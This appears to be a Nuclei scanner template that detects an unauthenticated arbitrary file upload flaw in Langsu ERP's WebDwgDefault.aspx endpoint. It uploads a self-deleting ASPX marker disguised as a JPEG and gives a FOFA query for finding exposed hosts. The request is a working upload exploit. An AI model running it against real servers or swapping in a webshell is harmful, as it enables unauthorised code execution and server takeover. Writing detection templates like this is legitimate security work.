http:
    - raw:
        - |
          POST /WebDwgDefault.aspx?IsSave=true&FileName={{username}}.aspx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

          ------WebKitFormBoundaryFfJZ4PlAZBixjELj
          Content-Disposition: form-data; name="file"; filename="{{username}}.aspx"
          Content-Type: image/jpeg

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /{{username}}.aspx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
id: langsuERP-WebDwgDefault_aspx-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
        朗速ERP WebDwgDefault.aspx 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 朗速ERP WebDwgDefault.aspx 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/YdaGy3uk5mGJoHiZG62uFA
    severity: high
    tags: []
variables:
    username: '{{to_lower(rand_base(6))}}'
